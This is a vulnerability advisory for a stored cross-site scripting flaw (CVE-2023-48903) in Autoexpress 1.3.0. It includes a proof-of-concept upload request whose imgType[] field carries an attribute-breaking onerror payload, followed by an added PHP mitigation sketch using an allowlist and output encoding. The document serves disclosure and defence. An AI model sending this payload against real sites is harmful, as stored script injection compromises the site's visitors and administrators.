- Tramyardg Autoexpress 1.3.0 Cross Site Scripting
- Authored by Scott White
- Tramyardg Autoexpress version 1.3.0 suffers from a persistent cross site scripting vulnerability.
- advisories | CVE-2023-48903
- SHA-256 | e5d38e6f27165a96b83eb9ff1357086d82ad45bbc6a91a8b4f1d9aa5f2e996a5
# Exploit Title: tramyardg autoexpress - Stored Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: 11/28/2023
# Exploit Author: Scott White
# Vendor Homepage: https://github.com/tramyardg/autoexpress
# Version: v1.3.0
# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52
# CVE : CVE-2023-48903
# References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48903
https://www.cve.org/CVERecord?id=CVE-2023-48903
# Description:
Autoexpress 1.3.0 is affected by a stored cross-site scripting (XSS) vulnerability that allows an unauthenticated attacker to execute JavaScript commands.
# Proof of Concept:
+ Go to "http://localhost/autoexpress"
+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)
+ The form-data name "imgType[]" is vulnerable
# Sample Request
POST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1
Host: localhost
Content-Length: 17016
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YR
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="files[]"; filename="image.jpeg"
Content-Type: image/jpeg

IMAGE_CONTENT
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="id"

CAR_ID
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="fd[]"

IMAGE_CONTENT_BASE64_ENCODED
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="imgType[]"

data:image/jpeg;base64"onerror=alert(1002)<!--
------WebKitFormBoundary9juDWgTa5YsjE2YR--
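
# Mitigation sketch (added example, not part of the original advisory and not code from the Autoexpress project):
The imgType[] value in the sample request breaks out of a quoted attribute, so the fix is an exact-match allowlist on input plus attribute encoding on output. The function names, the allowlist contents, and the assumption that the stored value is later written into a double-quoted img src attribute are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: the only data-URI prefixes the upload form should ever send.
const ALLOWED_IMG_TYPES = [
    'data:image/jpeg;base64',
    'data:image/png;base64',
    'data:image/gif;base64',
];

/** Input check: accept an imgType[] value only on exact match with the allowlist. */
function valid_img_type(string $imgType): bool
{
    return in_array($imgType, ALLOWED_IMG_TYPES, true);
}

/** Input check: the image body must be strict, non-empty base64. */
function valid_base64(string $data): bool
{
    return $data !== '' && base64_decode($data, true) !== false;
}

/** Output encoding: escape for a quoted HTML attribute even after validation. */
function render_img(string $imgType, string $data): string
{
    $src = htmlspecialchars($imgType . ',' . $data, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<img src="' . $src . '" alt="">';
}

// Constructed sample values; the second is the imgType[] value from the sample request.
$samples = [
    'data:image/jpeg;base64',
    'data:image/jpeg;base64"onerror=alert(1002)<!--',
];
$body = base64_encode('constructed image bytes');

foreach ($samples as $imgType) {
    if (!valid_img_type($imgType) || !valid_base64($body)) {
        echo 'rejected: ', htmlspecialchars($imgType, ENT_QUOTES, 'UTF-8'), PHP_EOL;
        continue; // a real handler would answer 400 and store nothing
    }
    echo render_img($imgType, $body), PHP_EOL;
}
```

Validation alone protects new uploads; the encoding in render_img() also neutralizes values that were stored before the check existed.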